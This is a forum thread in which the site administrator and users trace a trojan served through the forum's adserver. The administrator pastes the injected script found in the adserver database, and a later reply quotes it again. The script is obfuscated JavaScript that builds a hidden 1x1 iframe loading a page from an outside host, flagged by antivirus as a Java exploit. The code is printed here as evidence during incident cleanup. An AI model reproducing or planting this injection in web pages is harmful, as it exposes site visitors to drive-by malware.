• Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
  • Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!

Trojan from blivvsen com

Collapse
X
  •  
  • Filter
  • Time
  • Show
Clear All
new posts

    #11
    Cheers. Have removed adserver for the minute while I check further.

    Comment


      #12
      Yep, that seems to have stopped it....
      Still Invoicing

      Comment


        #13
        Something wierd was going on here too. Mucho disk thrashing and then it tried to load an avi file, I think. Checked Task Manager and there was an odd looking exe file running. Killed off the processes and I think it's OK but will be doing a proper check later.

        Edit: the ads are usually blocked on this PC (the old hosts file dodge) because it is very slow.
        Last edited by Zippy; 21 September 2010, 00:16.
        +50 Xeno Geek Points
        Come back Toolpusher, scotspine, Voodooflux. Pogle
        As for the rest of you - DILLIGAF

        Purveyor of fine quality smut since 2005

        CUK Olympic University Challenge Champions 2010/2012

        Comment


          #14
          Cheers blacjac, got to be the adserver. So why is my Kaspersky not showing a problem?

          Would def run a scan Zippy. Sorry

          Comment


            #15
            Originally posted by administrator View Post
            Cheers blacjac, got to be the adserver. So why is my Kaspersky not showing a problem?

            Would def run a scan Zippy. Sorry
            Right after Mr Z inputs his bank details <snigger>
            +50 Xeno Geek Points
            Come back Toolpusher, scotspine, Voodooflux. Pogle
            As for the rest of you - DILLIGAF

            Purveyor of fine quality smut since 2005

            CUK Olympic University Challenge Champions 2010/2012

            Comment


              #16
              Originally posted by administrator View Post
              Cheers blacjac, got to be the adserver. So why is my Kaspersky not showing a problem?
              No probs, but why can't I seem to get my screenshot to work inline?
              Still Invoicing

              Comment


                #17
                Originally posted by Zippy View Post
                Right after Mr Z inputs his bank details <snigger>
                Send me the invoice if you have to pay for it...

                I did the free trial of Kaspersky as Owlhoot said it was warning him of problems, they do a free trial Did the updates and quick scan showing nothing and full scan showing no problems so far either.

                Pig tulip. Found the problem. Is the adserver:

                Code:
                <script language="JavaScript">var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') <= 0 && dc.cookie.indexOf('1=o') > 0){\
                function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}\
                if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;}\
                if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\\"text/javascript\\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\\"http://blivvsen. com/shuffle/index.php?s=IBB@G\\" ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'\\"></ifra'+'me>');");dc.writeln("//--><\\/script>");} var run=1;\
                date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}</script>
                The append table of the adserver is full of this but don't understand why this wasn't showing in the source when I was viewing it. Maybe as it had tried to infect me but browser was beyond the hack so it then hid it from me?

                Sorry all, very disappointed with myself for not spotting sooner.

                Comment


                  #18
                  On full scan Kaspersky finally kicked in:
                  Exploit.Java.Agent.bu - Securelist

                  Comment


                    #19
                    Originally posted by blacjac View Post
                    No probs, but why can't I seem to get my screenshot to work inline?
                    Might have inline images on this forum turned off. Will check once sorted the adserver DB out.

                    Comment


                      #20
                      Originally posted by administrator View Post
                      Send me the invoice if you have to pay for it...

                      I did the free trial of Kaspersky as Owlhoot said it was warning him of problems, they do a free trial Did the updates and quick scan showing nothing and full scan showing no problems so far either.

                      Pig tulip. Found the problem. Is the adserver:

                      Code:
                      <script language="JavaScript">var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') <= 0 && dc.cookie.indexOf('1=o') > 0){\
                      function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}\
                      if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;}\
                      if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\\"text/javascript\\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\\"http://blivvsen. com/shuffle/index.php?s=IBB@G\\" ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'\\"></ifra'+'me>');");dc.writeln("//--><\\/script>");} var run=1;\
                      date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}</script>
                      The append table of the adserver is full of this but don't understand why this wasn't showing in the source when I was viewing it. Maybe as it had tried to infect me but browser was beyond the hack so it then hid it from me?

                      Sorry all, very disappointed with myself for not spotting sooner.
                      Don't worry. If the little bastard has got me I'll sort it.
                      +50 Xeno Geek Points
                      Come back Toolpusher, scotspine, Voodooflux. Pogle
                      As for the rest of you - DILLIGAF

                      Purveyor of fine quality smut since 2005

                      CUK Olympic University Challenge Champions 2010/2012

                      Comment

                      Working...
                      X